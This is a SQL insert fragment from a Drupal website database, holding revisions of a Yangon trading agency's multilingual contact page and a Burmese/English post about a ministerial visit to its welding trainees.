('page', 0, 11, 261, 'ko', 0, '<h4><strong>뉴코멧 트레이딩 에이전시</strong><br>&nbsp;</h4><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing)<br>어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마<br>&nbsp;</p><p>전화번호: 09 775556677&nbsp;, 09 5556677, 01- 8393300, 8393393, 8393344</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 262, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01- 8393300, 8393344, 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 262, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01- 8393300, 8393344, 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 262, 'ko', 0, '<h4><strong>뉴코멧 트레이딩 에이전시</strong><br>&nbsp;</h4><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing)<br>어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마<br>&nbsp;</p><p>전화번호: 01- 8393300, 8393344, 8393393, 09 775556677</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 289, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01 8393300, 01 8393344, 01 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 289, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01- 8393300, 8393344, 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 289, 'ko', 0, '<h4><strong>뉴코멧 트레이딩 에이전시</strong><br>&nbsp;</h4><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing)<br>어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마<br>&nbsp;</p><p>전화번호: 01- 8393300, 8393344, 8393393, 09 775556677</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 290, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01 8393300, 01 8393344, 01 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 290, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01 8393300, 01 8393344, 01 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 11, 290, 'ko', 0, '<h4><strong>뉴코멧 트레이딩 에이전시</strong><br>&nbsp;</h4><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing)<br>어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마<br>&nbsp;</p><p>전화번호: 01- 8393300, 8393344, 8393393, 09 775556677</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 291, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01 8393300, 01 8393344, 01 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 291, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01 8393300, 01 8393344, 01 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p>', '', 'full_html'),
('page', 0, 11, 291, 'ko', 0, '<h4><strong>뉴코멧 트레이딩 에이전시</strong><br>&nbsp;</h4><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing)<br>어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마<br>&nbsp;</p><p>전화번호: 01 8393300, 01 8393344, 01 8393393, 09 775556677</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 314, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01 8393300, 01 8393344, 01 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 314, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01 8393300, 01 8393344, 01 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
('page', 0, 11, 314, 'ko', 0, '<h4><strong>뉴코멧 트레이딩 에이전시</strong><br>&nbsp;</h4><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing)<br>어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마<br>&nbsp;</p><p>전화번호: 01 8393300, 01 8393344, 01 8393393, 09 775556677</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('activities', 0, 17, 57, 'en', 0, '<p><img data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\">(၃-၆-၂၀၂၃)</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 58, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(၃-၆-၂၀၂၃)</p><p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 119, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(၃-၆-၂၀၂၃)</p><p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 119, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(၃-၆-၂၀၂၃)</p><p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 120, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(၃-၆-၂၀၂၃)</p><p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 120, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(၃-၆-၂၀၂၃)</p><p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 120, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(၃-၆-၂၀၂၃)</p><p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 148, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(၃-၆-၂၀၂၃)</p><p>The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalai Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
